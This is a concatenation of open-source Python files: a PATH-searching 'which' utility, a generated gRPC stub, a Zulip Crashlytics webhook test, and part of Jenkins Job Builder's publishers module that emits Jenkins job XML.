if sys.platform.startswith("win"):
path.insert(0, os.curdir) # implied by Windows shell
else:
usingGivenPath = 1
# Windows has the concept of a list of extensions (PATHEXT env var).
if sys.platform.startswith("win"):
if exts is None:
exts = os.environ.get("PATHEXT", "").split(os.pathsep)
# If '.exe' is not in exts then obviously this is Win9x and
# or a bogus PATHEXT, then use a reasonable default.
for ext in exts:
if ext.lower() == ".exe":
break
else:
exts = ['.COM', '.EXE', '.BAT']
elif not isinstance(exts, list):
raise TypeError("'exts' argument must be a list or None")
else:
if exts is not None:
raise WhichError("'exts' argument is not supported on "\
"platform '%s'" % sys.platform)
exts = []
# File name cannot have path separators because PATH lookup does not
# work that way.
if os.sep in command or os.altsep and os.altsep in command:
pass
else:
for i in range(len(path)):
dirName = path[i]
# On windows the dirName *could* be quoted, drop the quotes
if sys.platform.startswith("win") and len(dirName) >= 2\
and dirName[0] == '"' and dirName[-1] == '"':
dirName = dirName[1:-1]
for ext in ['']+exts:
absName = os.path.abspath(
os.path.normpath(os.path.join(dirName, command+ext)))
if os.path.isfile(absName):
if usingGivenPath:
fromWhere = "from given path element %d" % i
elif not sys.platform.startswith("win"):
fromWhere = "from PATH element %d" % i
elif i == 0:
fromWhere = "from current directory"
else:
fromWhere = "from PATH element %d" % (i-1)
match = _cull((absName, fromWhere), matches, verbose)
if match:
if verbose:
yield match
else:
yield match[0]
match = _getRegisteredExecutable(command)
if match is not None:
match = _cull(match, matches, verbose)
if match:
if verbose:
yield match
else:
yield match[0]
def which(command, path=None, verbose=0, exts=None):
"""Return the full path to the first match of the given command on
the path.
"command" is a the name of the executable to search for.
"path" is an optional alternate path list to search. The default it
to use the PATH environment variable.
"verbose", if true, will cause a 2-tuple to be returned. The second
element is a textual description of where the match was found.
"exts" optionally allows one to specify a list of extensions to use
instead of the standard list for this system. This can
effectively be used as an optimization to, for example, avoid
stat's of "foo.vbs" when searching for "foo" and you know it is
not a VisualBasic script but ".vbs" is on PATHEXT. This option
is only supported on Windows.
If no match is found for the command, a WhichError is raised.
"""
try:
match = whichgen(command, path, verbose, exts).next()
except StopIteration:
raise WhichError("Could not find '%s' on the path." % command)
return match
def whichall(command, path=None, verbose=0, exts=None):
"""Return a list of full paths to all matches of the given command
on the path.
"command" is a the name of the executable to search for.
"path" is an optional alternate path list to search. The default it
to use the PATH environment variable.
"verbose", if true, will cause a 2-tuple to be returned for each
match. The second element is a textual description of where the
match was found.
"exts" optionally allows one to specify a list of extensions to use
instead of the standard list for this system. This can
effectively be used as an optimization to, for example, avoid
stat's of "foo.vbs" when searching for "foo" and you know it is
not a VisualBasic script but ".vbs" is on PATHEXT. This option
is only supported on Windows.
"""
return list( whichgen(command, path, verbose, exts) )
#---- mainline
def main(argv):
all = 0
verbose = 0
altpath = None
exts = None
try:
optlist, args = getopt.getopt(argv[1:], 'haVvqp:e:',
['help', 'all', 'version', 'verbose', 'quiet', 'path=', 'exts='])
except getopt.GetoptError, msg:
sys.stderr.write("which: error: %s. Your invocation was: %s\n"\
% (msg, argv))
sys.stderr.write("Try 'which --help'.\n")
return 1
for opt, optarg in optlist:
if opt in ('-h', '--help'):
print _cmdlnUsage
return 0
elif opt in ('-V', '--version'):
print "which %s" % __version__
return 0
elif opt in ('-a', '--all'):
all = 1
elif opt in ('-v', '--verbose'):
verbose = 1
elif opt in ('-q', '--quiet'):
verbose = 0
elif opt in ('-p', '--path'):
if optarg:
altpath = optarg.split(os.pathsep)
else:
altpath = []
elif opt in ('-e', '--exts'):
if optarg:
exts = optarg.split(os.pathsep)
else:
exts = []
if len(args) == 0:
return -1
failures = 0
for arg in args:
#print "debug: search for %r" % arg
nmatches = 0
for match in whichgen(arg, path=altpath, verbose=verbose, exts=exts):
if verbose:
print "%s (%s)" % match
else:
print match
nmatches += 1
if not all:
break
if not nmatches:
failures += 1
return failures
if __name__ == "__main__":
sys.exit( main(sys.argv) )
|
gurbuzali/hazelcast-jet
|
refs/heads/master
|
extensions/python/src/main/resources/jet_to_python_pb2_grpc.py
|
10
|
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
import grpc
import jet_to_python_pb2 as jet__to__python__pb2
class JetToPythonStub(object):
# missing associated documentation comment in .proto file
pass
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.streamingCall = channel.stream_stream(
'/jet_to_python.JetToPython/streamingCall',
request_serializer=jet__to__python__pb2.InputMessage.SerializeToString,
response_deserializer=jet__to__python__pb2.OutputMessage.FromString,
)
class JetToPythonServicer(object):
# missing associated documentation comment in .proto file
pass
def streamingCall(self, request_iterator, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_JetToPythonServicer_to_server(servicer, server):
rpc_method_handlers = {
'streamingCall': grpc.stream_stream_rpc_method_handler(
servicer.streamingCall,
request_deserializer=jet__to__python__pb2.InputMessage.FromString,
response_serializer=jet__to__python__pb2.OutputMessage.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'jet_to_python.JetToPython', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
|
JPJPJPOPOP/zulip
|
refs/heads/master
|
zerver/webhooks/crashlytics/tests.py
|
31
|
# -*- coding: utf-8 -*-
from zerver.lib.test_classes import WebhookTestCase
class CrashlyticsHookTests(WebhookTestCase):
STREAM_NAME = 'crashlytics'
URL_TEMPLATE = u"/api/v1/external/crashlytics?stream={stream}&api_key={api_key}"
FIXTURE_DIR_NAME = 'crashlytics'
def test_crashlytics_verification_message(self):
# type: () -> None
last_message_before_request = self.get_last_message()
payload = self.get_body('verification')
url = self.build_webhook_url()
result = self.client_post(url, payload, content_type="application/json")
last_message_after_request = self.get_last_message()
self.assert_json_success(result)
self.assertEqual(last_message_after_request.pk, last_message_before_request.pk)
def test_crashlytics_build_in_success_status(self):
# type: () -> None
expected_subject = u"123: Issue Title"
expected_message = u"[Issue](http://crashlytics.com/full/url/to/issue) impacts at least 16 device(s)."
self.send_and_test_stream_message('issue_message', expected_subject, expected_message)
|
joostvdg/jenkins-job-builder
|
refs/heads/master
|
jenkins_jobs/modules/publishers.py
|
1
|
# Copyright 2012 Hewlett-Packard Development Company, L.P.
# Copyright 2012 Varnish Software AS
# Copyright 2013-2014 Antoine "hashar" Musso
# Copyright 2013-2014 Wikimedia Foundation Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Publishers define actions that the Jenkins job should perform after
the build is complete.
**Component**: publishers
:Macro: publisher
:Entry Point: jenkins_jobs.publishers
"""
import logging
import pkg_resources
import random
import sys
import xml.etree.ElementTree as XML
import six
from jenkins_jobs.errors import InvalidAttributeError
from jenkins_jobs.errors import JenkinsJobsException
from jenkins_jobs.errors import MissingAttributeError
import jenkins_jobs.modules.base
from jenkins_jobs.modules import hudson_model
import jenkins_jobs.modules.helpers as helpers
def archive(parser, xml_parent, data):
"""yaml: archive
Archive build artifacts
:arg str artifacts: path specifier for artifacts to archive
:arg str excludes: path specifier for artifacts to exclude (optional)
:arg bool latest-only: only keep the artifacts from the latest
successful build
:arg bool allow-empty: pass the build if no artifacts are
found (default false)
:arg bool only-if-success: archive artifacts only if build is successful
(default false)
:arg bool fingerprint: fingerprint all archived artifacts (default false)
:arg bool default-excludes: This option allows to enable or disable the
default Ant exclusions. (default true)
Example:
.. literalinclude:: /../../tests/publishers/fixtures/archive001.yaml
:language: yaml
"""
logger = logging.getLogger("%s:archive" % __name__)
archiver = XML.SubElement(xml_parent, 'hudson.tasks.ArtifactArchiver')
artifacts = XML.SubElement(archiver, 'artifacts')
artifacts.text = data['artifacts']
if 'excludes' in data:
excludes = XML.SubElement(archiver, 'excludes')
excludes.text = data['excludes']
latest = XML.SubElement(archiver, 'latestOnly')
# backward compatibility
latest_only = data.get('latest_only', False)
if 'latest_only' in data:
logger.warn('latest_only is deprecated please use latest-only')
if 'latest-only' in data:
latest_only = data['latest-only']
if latest_only:
latest.text = 'true'
else:
latest.text = 'false'
if 'allow-empty' in data:
empty = XML.SubElement(archiver, 'allowEmptyArchive')
# Default behavior is to fail the build.
empty.text = str(data.get('allow-empty', False)).lower()
if 'only-if-success' in data:
success = XML.SubElement(archiver, 'onlyIfSuccessful')
success.text = str(data.get('only-if-success', False)).lower()
if 'fingerprint' in data:
fingerprint = XML.SubElement(archiver, 'fingerprint')
fingerprint.text = str(data.get('fingerprint', False)).lower()
default_excludes = XML.SubElement(archiver, 'defaultExcludes')
default_excludes.text = str(data.get('default-excludes', True)).lower()
def blame_upstream(parser, xml_parent, data):
"""yaml: blame-upstream
Notify upstream commiters when build fails
Requires the Jenkins :jenkins-wiki:`Blame upstream commiters Plugin
<Blame+Upstream+Committers+Plugin>`.
Example:
.. literalinclude:: /../../tests/publishers/fixtures/blame001.yaml
:language: yaml
"""
XML.SubElement(xml_parent,
'hudson.plugins.blame__upstream__commiters.'
'BlameUpstreamCommitersPublisher')
def jclouds(parser, xml_parent, data):
"""yaml: jclouds
JClouds Cloud Storage Settings provides a way to store artifacts on
JClouds supported storage providers. Requires the Jenkins
:jenkins-wiki:`JClouds Plugin <JClouds+Plugin>`.
JClouds Cloud Storage Settings must be configured for the Jenkins instance.
:arg str profile: preconfigured storage profile (required)
:arg str files: files to upload (regex) (required)
:arg str basedir: the source file path (relative to workspace, Optional)
:arg str container: the destination container name (required)
:arg bool hierarchy: keep hierarchy (default false)
Example:
.. literalinclude:: /../../tests/publishers/fixtures/jclouds001.yaml
"""
deployer = XML.SubElement(xml_parent,
'jenkins.plugins.jclouds.blobstore.'
'BlobStorePublisher')
if 'profile' not in data:
raise JenkinsJobsException('profile parameter is missing')
XML.SubElement(deployer, 'profileName').text = data.get('profile')
entries = XML.SubElement(deployer, 'entries')
deployer_entry = XML.SubElement(entries,
'jenkins.plugins.jclouds.blobstore.'
'BlobStoreEntry')
try:
XML.SubElement(deployer_entry, 'container').text = data['container']
XML.SubElement(deployer_entry, 'path').text = data.get('basedir', '')
XML.SubElement(deployer_entry, 'sourceFile').text = data['files']
except KeyError as e:
raise JenkinsJobsException("blobstore requires '%s' to be set"
% e.args[0])
XML.SubElement(deployer_entry, 'keepHierarchy').text = str(
data.get('hierarchy', False)).lower()
def javadoc(parser, xml_parent, data):
"""yaml: javadoc
Publish Javadoc
Requires the Jenkins :jenkins-wiki:`Javadoc Plugin <Javadoc+Plugin>`.
:arg str directory: Directory relative to the root of the workspace,
such as 'myproject/build/javadoc' (optional)
:arg bool keep-all-successful: When true, it will retain Javadoc for each
successful build. This allows you to browse Javadoc for older builds,
at the expense of additional disk space requirement. If false, it will
only keep the latest Javadoc, so older Javadoc will be overwritten as
new builds succeed. (default false)
Example:
.. literalinclude:: /../../tests/publishers/fixtures/javadoc001.yaml
:language: yaml
"""
root = XML.SubElement(xml_parent, 'hudson.tasks.JavadocArchiver')
if 'directory' in data:
XML.SubElement(root, 'javadocDir').text = data.get('directory', '')
XML.SubElement(root, 'keepAll').text = str(data.get(
'keep-all-successful', False)).lower()
def jdepend(parser, xml_parent, data):
"""yaml: jdepend
Publish jdepend report
Requires the :jenkins-wiki:`JDepend Plugin <JDepend+Plugin>`.
:arg str file: path to jdepend file (required)
Example:
.. literalinclude:: /../../tests/publishers/fixtures/jdepend001.yaml
:language: yaml
"""
jdepend = XML.SubElement(
xml_parent,
'hudson.plugins.jdepend.JDependRecorder')
filepath = data.get('file', None)
if filepath is None:
raise MissingAttributeError('file')
XML.SubElement(jdepend, 'configuredJDependFile').text = str(filepath)
def hue_light(parser, xml_parent, data):
"""yaml: hue-light
This plugin shows the state of your builds using the awesome Philips hue
lights.
Requires the Jenkins :jenkins-wiki:`hue-light Plugin
<hue-light+Plugin>`.
:arg int light-id: ID of light. Define multiple lights by a comma as a
separator (required)
:arg string pre-build: Colour of building state (default 'blue')
:arg string good-build: Colour of succesful state (default 'green')
:arg string unstable-build: Colour of unstable state (default 'yellow')
:arg string bad-build: Colour of unsuccessful state (default 'red')
Example:
.. literalinclude::
/../../tests/publishers/fixtures/hue-light-minimal.yaml
:language: yaml
.. literalinclude::
/../../tests/publishers/fixtures/hue-light001.yaml
:language: yaml
"""
hue_light = XML.SubElement(
xml_parent, 'org.jenkinsci.plugins.hue__light.LightNotifier')
hue_light.set('plugin', 'hue-light')
if 'light-id' not in data:
raise MissingAttributeError('light-id')
lightId = XML.SubElement(hue_light, 'lightId')
XML.SubElement(lightId, 'string').text = str(data.get(
'light-id', ''))
XML.SubElement(hue_light, 'preBuild').text = data.get(
'pre-build', 'blue')
XML.SubElement(hue_light, 'goodBuild').text = data.get(
'good-build', 'green')
XML.SubElement(hue_light, 'unstableBuild').text = data.get(
'unstable-build', 'yellow')
XML.SubElement(hue_light, 'badBuild').text = data.get(
'bad-build', 'red')
def campfire(parser, xml_parent, data):
"""yaml: campfire
Send build notifications to Campfire rooms.
Requires the Jenkins :jenkins-wiki:`Campfire Plugin <Campfire+Plugin>`.
Campfire notifications global default values must be configured for
the Jenkins instance. Default values will be used if no specific
values are specified for each job, so all config params are optional.
:arg str subdomain: override the default campfire subdomain
:arg str token: override the default API token
:arg bool ssl: override the default 'use SSL'
:arg str room: override the default room name
Example:
.. literalinclude:: /../../tests/publishers/fixtures/campfire001.yaml
:language: yaml
"""
root = XML.SubElement(xml_parent,
'hudson.plugins.campfire.'
'CampfireNotifier')
campfire = XML.SubElement(root, 'campfire')
if ('subdomain' in data and data['subdomain']):
subdomain = XML.SubElement(campfire, 'subdomain')
subdomain.text = data['subdomain']
if ('token' in data and data['token']):
token = XML.SubElement(campfire, 'token')
token.text = data['token']
if ('ssl' in data):
ssl = XML.SubElement(campfire, 'ssl')
ssl.text = str(data['ssl']).lower()
if ('room' in data and data['room']):
room = XML.SubElement(root, 'room')
name = XML.SubElement(room, 'name')
name.text = data['room']
XML.SubElement(room, 'campfire reference="../../campfire"')
def emotional_jenkins(parser, xml_parent, data):
"""yaml: emotional-jenkins
Emotional Jenkins. This funny plugin changes the expression of Mr. Jenkins
in the background when your builds fail.
Requires the Jenkins :jenkins-wiki:`Emotional Jenkins Plugin
<Emotional+Jenkins+Plugin>`.
Example:
.. literalinclude:: /../../tests/publishers/fixtures/emotional-jenkins.yaml
:language: yaml
"""
XML.SubElement(xml_parent,
'org.jenkinsci.plugins.emotional__jenkins.'
'EmotionalJenkinsPublisher')
def trigger_parameterized_builds(parser, xml_parent, data):
"""yaml: trigger-parameterized-builds
Trigger parameterized builds of other jobs.
Requires the Jenkins :jenkins-wiki:`Parameterized Trigger Plugin
<Parameterized+Trigger+Plugin>`.
Use of the `node-label-name` or `node-label` parameters
requires the Jenkins :jenkins-wiki:`NodeLabel Parameter Plugin
<NodeLabel+Parameter+Plugin>`.
Note: 'node-parameters' overrides the Node that the triggered
project is tied to.
:arg list project: list the jobs to trigger, will generate comma-separated
string containing the named jobs.
:arg str predefined-parameters: parameters to pass to the other
job (optional)
:arg bool current-parameters: Whether to include the parameters passed
to the current build to the triggered job (optional)
:arg bool node-parameters: Use the same Node for the triggered builds
that was used for this build. (optional)
:arg bool svn-revision: Pass svn revision to the triggered job (optional)
:arg bool include-upstream: Include/pass through Upstream SVN Revisons.
Only valid when 'svn-revision' is true. (default false)
:arg dict git-revision: Passes git revision to the triggered job
(optional).
* **combine-queued-commits** (bool): Whether to combine queued git
hashes or not (default false)
:arg bool combine-queued-commits: Combine Queued git hashes. Only valid
when 'git-revision' is true. (default false)
.. deprecated:: 1.5.0 Please use `combine-queued-commits` under the
`git-revision` argument instead.
:arg dict boolean-parameters: Pass boolean parameters to the downstream
jobs. Specify the name and boolean value mapping of the parameters.
(optional)
:arg str condition: when to trigger the other job. Can be: 'SUCCESS',
'UNSTABLE', 'FAILED_OR_BETTER', 'UNSTABLE_OR_BETTER',
'UNSTABLE_OR_WORSE', 'FAILED', 'ALWAYS'. (default 'ALWAYS')
:arg str property-file: Use properties from file (optional)
:arg bool fail-on-missing: Blocks the triggering of the downstream jobs
if any of the property files are not found in the workspace.
Only valid when 'property-file' is specified.
(default 'False')
:arg bool use-matrix-child-files: Use files in workspaces of child
builds (default 'False')
:arg str matrix-child-combination-filter: A Groovy expression to filter
the child builds to look in for files
:arg bool only-exact-matrix-child-runs: Use only child builds triggered
exactly by the parent.
:arg str file-encoding: Encoding of contents of the files. If not
specified, default encoding of the platform is used. Only valid when
'property-file' is specified. (optional)
:arg bool trigger-with-no-params: Trigger a build even when there are
currently no parameters defined (default 'False')
:arg str restrict-matrix-project: Filter that restricts the subset
of the combinations that the downstream project will run (optional)
:arg str node-label-name: Specify the Name for the NodeLabel parameter.
(optional)
:arg str node-label: Specify the Node for the NodeLabel parameter.
(optional)
Example:
.. literalinclude::
/../../tests/publishers/fixtures/trigger_parameterized_builds001.yaml
:language: yaml
.. literalinclude::
/../../tests/publishers/fixtures/trigger_parameterized_builds003.yaml
:language: yaml
"""
logger = logging.getLogger("%s:trigger-parameterized-builds" % __name__)
pt_prefix = 'hudson.plugins.parameterizedtrigger.'
tbuilder = XML.SubElement(xml_parent, pt_prefix + 'BuildTrigger')
configs = XML.SubElement(tbuilder, 'configs')
# original order
orig_order = [
'predefined-parameters',
'git-revision',
'property-file',
'current-parameters',
'node-parameters',
'svn-revision',
'restrict-matrix-project',
'node-label-name',
'node-label',
'boolean-parameters',
]
try:
if parser.jjb_config.config_parser.getboolean('__future__',
'param_order_from_yaml'):
orig_order = None
except six.moves.configparser.NoSectionError:
pass
if orig_order:
logger.warn(
"Using deprecated order for parameter sets in "
"triggered-parameterized-builds. This will be changed in a future "
"release to inherit the order from the user defined yaml. To "
"enable this behaviour immediately, set the config option "
"'__future__.param_order_from_yaml' to 'true' and change the "
"input job configuration to use the desired order")
for project_def in data:
tconfig = XML.SubElement(configs, pt_prefix + 'BuildTriggerConfig')
tconfigs = XML.SubElement(tconfig, 'configs')
if orig_order:
parameters = orig_order
else:
parameters = project_def.keys()
for param_type in parameters:
param_value = project_def.get(param_type)
if param_value is None:
continue
if param_type == 'predefined-parameters':
params = XML.SubElement(tconfigs, pt_prefix +
'PredefinedBuildParameters')
properties = XML.SubElement(params, 'properties')
properties.text = param_value
elif param_type == 'git-revision' and param_value:
if 'combine-queued-commits' in project_def:
logger.warn(
"'combine-queued-commit' has moved to reside under "
"'git-revision' configuration, please update your "
"configs as support for this will be removed."
)
git_revision = {
'combine-queued-commits':
project_def['combine-queued-commits']
}
else:
git_revision = project_def['git-revision']
helpers.append_git_revision_config(tconfigs, git_revision)
elif param_type == 'property-file':
params = XML.SubElement(tconfigs,
pt_prefix + 'FileBuildParameters')
properties = XML.SubElement(params, 'propertiesFile')
properties.text = project_def['property-file']
failOnMissing = XML.SubElement(params, 'failTriggerOnMissing')
failOnMissing.text = str(project_def.get('fail-on-missing',
False)).lower()
if 'file-encoding' in project_def:
XML.SubElement(params, 'encoding'
).text = project_def['file-encoding']
if 'use-matrix-child-files' in project_def:
# TODO: These parameters only affect execution in
# publishers of matrix projects; we should warn if they are
# used in other contexts.
XML.SubElement(params, "useMatrixChild").text = (
str(project_def['use-matrix-child-files']).lower())
XML.SubElement(params, "combinationFilter").text = (
project_def.get('matrix-child-combination-filter', ''))
XML.SubElement(params, "onlyExactRuns").text = (
str(project_def.get('only-exact-matrix-child-runs',
False)).lower())
elif param_type == 'current-parameters' and param_value:
XML.SubElement(tconfigs, pt_prefix + 'CurrentBuildParameters')
elif param_type == 'node-parameters' and param_value:
XML.SubElement(tconfigs, pt_prefix + 'NodeParameters')
elif param_type == 'svn-revision' and param_value:
param = XML.SubElement(tconfigs, pt_prefix +
'SubversionRevisionBuildParameters')
XML.SubElement(param, 'includeUpstreamParameters').text = str(
project_def.get('include-upstream', False)).lower()
elif param_type == 'restrict-matrix-project' and param_value:
subset = XML.SubElement(tconfigs, pt_prefix +
'matrix.MatrixSubsetBuildParameters')
XML.SubElement(subset, 'filter').text = \
project_def['restrict-matrix-project']
elif (param_type == 'node-label-name' or
param_type == 'node-label'):
tag_name = ('org.jvnet.jenkins.plugins.nodelabelparameter.'
'parameterizedtrigger.NodeLabelBuildParameter')
if tconfigs.find(tag_name) is not None:
# already processed and can only have one
continue
params = XML.SubElement(tconfigs, tag_name)
name = XML.SubElement(params, 'name')
if 'node-label-name' in project_def:
name.text = project_def['node-label-name']
label = XML.SubElement(params, 'nodeLabel')
if 'node-label' in project_def:
label.text = project_def['node-label']
elif param_type == 'boolean-parameters' and param_value:
params = XML.SubElement(tconfigs,
pt_prefix + 'BooleanParameters')
config_tag = XML.SubElement(params, 'configs')
param_tag_text = pt_prefix + 'BooleanParameterConfig'
params_list = param_value
for name, value in params_list.items():
param_tag = XML.SubElement(config_tag, param_tag_text)
XML.SubElement(param_tag, 'name').text = name
XML.SubElement(param_tag, 'value').text = str(
value or False).lower()
if not list(tconfigs):
# not child parameter tags added
tconfigs.set('class', 'java.util.Collections$EmptyList')
projects = XML.SubElement(tconfig, 'projects')
if isinstance(project_def['project'], list):
projects.text = ",".join(project_def['project'])
else:
projects.text = project_def['project']
condition = XML.SubElement(tconfig, 'condition')
condition.text = project_def.get('condition', 'ALWAYS')
trigger_with_no_params = XML.SubElement(tconfig,
'triggerWithNoParameters')
trigger_with_no_params.text = str(
project_def.get('trigger-with-no-params', False)).lower()
def trigger(parser, xml_parent, data):
"""yaml: trigger
Trigger non-parametrised builds of other jobs.
:arg str project: name of the job to trigger
:arg str threshold: when to trigger the other job (default 'SUCCESS'),
alternatives: SUCCESS, UNSTABLE, FAILURE
Example:
.. literalinclude:: /../../tests/publishers/fixtures/trigger_success.yaml
:language: yaml
"""
tconfig = XML.SubElement(xml_parent, 'hudson.tasks.BuildTrigger')
childProjects = XML.SubElement(tconfig, 'childProjects')
childProjects.text = data['project']
tthreshold = XML.SubElement(tconfig, 'threshold')
threshold = data.get('threshold', 'SUCCESS')
supported_thresholds = ['SUCCESS', 'UNSTABLE', 'FAILURE']
if threshold not in supported_thresholds:
raise JenkinsJobsException("threshold must be one of %s" %
", ".join(supported_thresholds))
tname = XML.SubElement(tthreshold, 'name')
tname.text = hudson_model.THRESHOLDS[threshold]['name']
tordinal = XML.SubElement(tthreshold, 'ordinal')
tordinal.text = hudson_model.THRESHOLDS[threshold]['ordinal']
tcolor = XML.SubElement(tthreshold, 'color')
tcolor.text = hudson_model.THRESHOLDS[threshold]['color']
def clone_workspace(parser, xml_parent, data):
"""yaml: clone-workspace
Archive the workspace from builds of one project and reuse them as the SCM
source for another project.
Requires the Jenkins :jenkins-wiki:`Clone Workspace SCM Plugin
<Clone+Workspace+SCM+Plugin>`.
:arg str workspace-glob: Files to include in cloned workspace
:arg str workspace-exclude-glob: Files to exclude from cloned workspace
:arg str criteria: Criteria for build to be archived. Can be 'any',
'not failed', or 'successful'. (default any )
:arg str archive-method: Choose the method to use for archiving the
workspace. Can be 'tar' or 'zip'. (default tar)
:arg bool override-default-excludes: Override default ant excludes.
(default false)
Minimal example:
.. literalinclude::
/../../tests/publishers/fixtures/clone-workspace001.yaml
:language: yaml
Full example:
.. literalinclude::
/../../tests/publishers/fixtures/clone-workspace002.yaml
:language: yaml
"""
cloneworkspace = XML.SubElement(
xml_parent,
'hudson.plugins.cloneworkspace.CloneWorkspacePublisher',
{'plugin': 'clone-workspace-scm'})
XML.SubElement(
cloneworkspace,
'workspaceGlob').text = data.get('workspace-glob', None)
if 'workspace-exclude-glob' in data:
XML.SubElement(
cloneworkspace,
'workspaceExcludeGlob').text = data['workspace-exclude-glob']
criteria_list = ['Any', 'Not Failed', 'Successful']
criteria = data.get('criteria', 'Any').title()
if 'criteria' in data and criteria not in criteria_list:
raise JenkinsJobsException(
'clone-workspace criteria must be one of: '
+ ', '.join(criteria_list))
else:
XML.SubElement(cloneworkspace, 'criteria').text = criteria
archive_list = ['TAR', 'ZIP']
archive_method = data.get('archive-method', 'TAR').upper()
if 'archive-method' in data and archive_method not in archive_list:
raise JenkinsJobsException(
'clone-workspace archive-method must be one of: '
+ ', '.join(archive_list))
else:
XML.SubElement(cloneworkspace, 'archiveMethod').text = archive_method
override_default_excludes_str = str(
data.get('override-default-excludes', False)).lower()
override_default_excludes_elem = XML.SubElement(
cloneworkspace, 'overrideDefaultExcludes')
override_default_excludes_elem.text = override_default_excludes_str
def cloverphp(parser, xml_parent, data):
"""yaml: cloverphp
Capture code coverage reports from PHPUnit
Requires the Jenkins :jenkins-wiki:`Clover PHP Plugin <Clover+PHP+Plugin>`.
Your job definition should pass to PHPUnit the --coverage-clover option
pointing to a file in the workspace (ex: clover-coverage.xml). The filename
has to be filled in the `xml-location` field.
:arg str xml-location: Path to the coverage XML file generated by PHPUnit
using --coverage-clover. Relative to workspace. (required)
:arg dict html: When existent, whether the plugin should generate a HTML
report. Note that PHPUnit already provide a HTML report via its
--cover-html option which can be set in your builder (optional):
* **dir** (str): Directory where HTML report will be generated relative
to workspace. (required in `html` dict).
* **archive** (bool): Whether to archive HTML reports (default true).
:arg list metric-targets: List of metric targets to reach, must be one of
**healthy**, **unhealthy** and **failing**. Each metric target can takes
two parameters:
* **method** Target for method coverage
* **statement** Target for statements coverage
Whenever a metric target is not filled in, the Jenkins plugin can fill in
defaults for you (as of v0.3.3 of the plugin the healthy target will have
method: 70 and statement: 80 if both are left empty). Jenkins Job Builder
will mimic that feature to ensure clean configuration diff.
Minimal example:
.. literalinclude:: /../../tests/publishers/fixtures/cloverphp001.yaml
:language: yaml
Full example:
.. literalinclude:: /../../tests/publishers/fixtures/cloverphp002.yaml
:language: yaml
"""
cloverphp = XML.SubElement(
xml_parent,
'org.jenkinsci.plugins.cloverphp.CloverPHPPublisher')
# The plugin requires clover XML file to parse
if 'xml-location' not in data:
raise JenkinsJobsException('xml-location must be set')
# Whether HTML publishing has been checked
html_publish = False
# By default, disableArchiving = false. Note that we use
# reversed logic.
html_archive = True
if 'html' in data:
html_publish = True
html_dir = data['html'].get('dir', None)
html_archive = data['html'].get('archive', html_archive)
if html_dir is None:
# No point in going further, the plugin would not work
raise JenkinsJobsException('htmldir is required in a html block')
XML.SubElement(cloverphp, 'publishHtmlReport').text = \
str(html_publish).lower()
if html_publish:
XML.SubElement(cloverphp, 'reportDir').text = html_dir
XML.SubElement(cloverphp, 'xmlLocation').text = data.get('xml-location')
XML.SubElement(cloverphp, 'disableArchiving').text = \
str(not html_archive).lower()
# Handle targets
# Plugin v0.3.3 will fill defaults for us whenever healthy targets are both
# blanks.
default_metrics = {
'healthy': {'method': 70, 'statement': 80}
}
allowed_metrics = ['healthy', 'unhealthy', 'failing']
metrics = data.get('metric-targets', [])
# list of dicts to dict
metrics = dict(kv for m in metrics for kv in m.items())
# Populate defaults whenever nothing has been filled by user.
for default in default_metrics.keys():
if metrics.get(default, None) is None:
metrics[default] = default_metrics[default]
# The plugin would at least define empty targets so make sure
# we output them all in the XML regardless of what the user
# has or has not entered.
for target in allowed_metrics:
cur_target = XML.SubElement(cloverphp, target + 'Target')
for t_type in ['method', 'statement']:
val = metrics.get(target, {}).get(t_type)
if val is None or type(val) != int:
continue
if val < 0 or val > 100:
raise JenkinsJobsException(
"Publisher cloverphp metric target %s:%s = %s "
"is not in valid range 0-100." % (target, t_type, val))
XML.SubElement(cur_target, t_type + 'Coverage').text = str(val)
def coverage(parser, xml_parent, data):
"""yaml: coverage
WARNING: The coverage function is deprecated. Instead, use the
cobertura function to generate a cobertura coverage report.
Requires the Jenkins :jenkins-wiki:`Cobertura Coverage Plugin
<Cobertura+Plugin>`.
Example:
.. literalinclude:: /../../tests/publishers/fixtures/coverage001.yaml
:language: yaml
"""
logger = logging.getLogger(__name__)
logger.warn("Coverage function is deprecated. Switch to cobertura.")
cobertura = XML.SubElement(xml_parent,
'hudson.plugins.cobertura.CoberturaPublisher')
XML.SubElement(cobertura, 'coberturaReportFile').text = '**/coverage.xml'
XML.SubElement(cobertura, 'onlyStable').text = 'false'
healthy = XML.SubElement(cobertura, 'healthyTarget')
targets = XML.SubElement(healthy, 'targets', {
'class': 'enum-map',
'enum-type': 'hudson.plugins.cobertura.targets.CoverageMetric'})
entry = XML.SubElement(targets, 'entry')
XML.SubElement(entry, 'hudson.plugins.cobertura.targets.CoverageMetric'
).text = 'CONDITIONAL'
XML.SubElement(entry, 'int').text = '70'
entry = XML.SubElement(targets, 'entry')
XML.SubElement(entry, 'hudson.plugins.cobertura.targets.CoverageMetric'
).text = 'LINE'
XML.SubElement(entry, 'int').text = '80'
entry = XML.SubElement(targets, 'entry')
XML.SubElement(entry, 'hudson.plugins.cobertura.targets.CoverageMetric'
).text = 'METHOD'
XML.SubElement(entry, 'int').text = '80'
unhealthy = XML.SubElement(cobertura, 'unhealthyTarget')
targets = XML.SubElement(unhealthy, 'targets', {
'class': 'enum-map',
'enum-type': 'hudson.plugins.cobertura.targets.CoverageMetric'})
entry = XML.SubElement(targets, 'entry')
XML.SubElement(entry, 'hudson.plugins.cobertura.targets.CoverageMetric'
).text = 'CONDITIONAL'
XML.SubElement(entry, 'int').text = '0'
entry = XML.SubElement(targets, 'entry')
XML.SubElement(entry, 'hudson.plugins.cobertura.targets.CoverageMetric'
).text = 'LINE'
XML.SubElement(entry, 'int').text = '0'
entry = XML.SubElement(targets, 'entry')
XML.SubElement(entry, 'hudson.plugins.cobertura.targets.CoverageMetric'
).text = 'METHOD'
XML.SubElement(entry, 'int').text = '0'
failing = XML.SubElement(cobertura, 'failingTarget')
